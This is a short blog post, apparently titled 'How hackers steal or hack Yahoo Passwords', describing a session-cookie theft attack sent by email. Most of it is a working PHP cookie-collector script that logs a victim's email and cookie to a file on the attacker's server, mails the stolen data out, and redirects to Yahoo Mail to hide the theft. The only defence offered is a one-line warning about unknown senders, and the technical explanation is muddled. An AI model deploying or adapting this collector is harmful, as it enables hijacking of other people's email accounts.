I did a search on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easyer to attack than to deffend they say.
It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim’s yahoo email.
The bug:
…which calls this php script:
$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}
header(”Location:http://mail.yahoo.com”); ?> …which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly.
NOTE: The code is a little changed to make it hard to use without PHP knowledge.
How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER
Posts
No Response to "How hackers steal or hack Yahoo Passwords...."
Post a Comment